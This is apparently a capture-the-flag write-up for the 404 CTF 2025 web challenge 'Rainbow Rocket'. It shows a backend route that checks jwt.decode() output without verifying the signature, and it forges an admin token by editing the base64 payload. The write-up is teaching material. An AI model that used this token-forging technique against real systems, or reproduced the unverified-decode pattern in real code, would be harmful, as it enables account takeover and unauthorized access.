Rainbow Rocket | 404 CTF 2025

Rainbow Rocket

Resources

URL: https://rainbow-rocket.404ctf.fr
FILE: rainbow-rocket.zip (Frontend and Backend)

Exploration

We read the routes:

// Express router of the backend (registerUser, loginUser, getProfile,
// verification and flag are the controller functions defined in the backend)
const express = require('express');
const router = express.Router();

router.post('/register', registerUser);
router.post('/login', loginUser);
router.get('/profile', getProfile);
router.post('/verification', verification);
router.get('/flag', flag);

module.exports = router;

We can see a /flag route, but we can't access this page without an account.

const jwt = require('jsonwebtoken');

const flag = (req, res) => {
  // Expects "Authorization: Bearer <token>"
  const authHeader = req.headers.authorization;
  if (!authHeader) return res.status(401).json({ error: 'Unauthorized' });

  const token = authHeader.split(' ')[1];
  try {
    // jwt.decode() only base64-decodes the token; it does NOT verify the signature
    const decoded = jwt.decode(token);
    if (decoded?.username === 'admin') {
      return res.json({ flag: process.env.FLAG });
    } else {
      return res.status(403).json({ error: 'Forbidden' });
    }
  } catch (err) {
    return res.status(400).json({ error: 'Invalid token' });
  }
};

We need to be admin to access the flag. The token is read with jwt.decode(token), which only base64-decodes it and never verifies the signature, and then only the username claim is checked.

We need to get an account or find a way to log in as admin.

Exploitation

In register we create a T3stT3st account, using the same string as the password.

I can't access the page, but we can read the token used:

eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IlQzc3RUM3N0IiwiaWF0IjoxNzQ3MTM1NDY4fQ.d_Hlr_SbLpRSWE9mRTPt0ozuY1L04bKloCA1V1Rfu6zaSsJS7O08xv-XRfA9sL-HCzVtHsiEROpbf4pxnL9dY3tgnF5Xd5Sh-0wh5ZlYfLa2Lo6kSiG4C036o-a6tVR4Uo6lucf36hh5X31HtVmqE7ON843X9ME3ot-XN9bB41VLLRAJS-EKneAEufO8l6ICa9c4SkmT1o9ut63ZcWgrXDDB8wD7BlShI9lgLICRjYVAiEAohpQn5iN262pJbfpR9q0icXBdKMgHDIPYtokyPTyCjlsm4kXiOp4uWdpTaQZb2yCiGy1vXNe6gapYCe3NEP8UIht8QL1FqoQIeZ8eLw

We can decode it:

Header

{
  "alg": "RS256",
  "typ": "JWT"
}

Payload

{
  "username": "T3stT3st",
  "iat": 1747135468
}

Maybe we can just replace "T3stT3st" with "admin" and retry to enter the page.

We only need to change the payload, so let's base64-encode this:

{
    "username": "admin",
    "iat": 1747135468
}

We get this: ewogICAgInVzZXJuYW1lIjogImFkbWluIiwKICAgICJpYXQiOiAxNzQ3MTM1NDY4Cn0K

It works: we get the flag.

This post is licensed under CC BY 4.0 by the author.